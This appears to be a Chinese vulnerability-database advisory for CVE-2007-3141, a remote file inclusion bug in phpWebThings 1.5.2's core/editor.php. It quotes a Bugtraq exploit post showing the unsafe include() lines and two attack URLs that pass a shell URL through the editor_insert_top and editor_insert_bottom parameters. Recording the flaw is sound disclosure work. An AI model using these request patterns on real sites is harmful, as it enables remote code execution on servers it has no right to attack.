phpWebThings  core/editor.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190262 漏洞类型 未知
发布时间 2007-06-11 更新时间 2007-06-11
CVE编号 CVE-2007-3141 CNNVD-ID CNNVD-200706-177
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/86081
https://cxsecurity.com/issue/WLB-2007060047
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-177
|漏洞详情
phpWebThings的core/editor.php中存在PHP远程文件包含漏洞。远程攻击者可以借助editor_insert_top参数中的一个URL,执行任意的PHP代码。
|漏洞EXP

************
*script:phpWebThings ==>1.5.2 RFI
*
*dir url:http://sourceforge.net/project/showfiles.php?group_id=19103
*
*author:titanichacker
*
*c0ntact:the-modest-pirate (at) hotmail (dot) com [email concealed]
*
*H.P: hack-teach.com & mohandko.com & tryag.com
*
*bug in:
*
*(/core/editor.php)
*include($editor_insert_top);
*include($editor_insert_bottom);
*
*exploit:
*
*http://victim/path/core/editor.php?editor_insert_top=[shell]
*http://victim/path/core/editor.php?editor_insert_bottom=[shell]
*
*
*thanx
          cold-zero & mohandko & drbaka & arb-hawk & kof2002 & tryag & xp10 & egy-ghost & milw0rm
_________________________________________________________________
With Windows Live Hotmail, you can personalize your inbox with your favorite color.
www.windowslive-hotmail.com/learnmore/personalize.html?locale=en-us&ocid
=TXT_TAGLM_HMWL_reten_addcolor_0607
|受影响的产品
PhpWebThings PhpWebThings 1.5.2
|参考资料

来源:BUGTRAQ
名称:20070607phpWebThings==>1.5.2RFI
链接:http://www.securityfocus.com/archive/1/archive/1/470794/100/0/threaded
来源:SREASON
名称:2786
链接:http://securityreason.com/securityalert/2786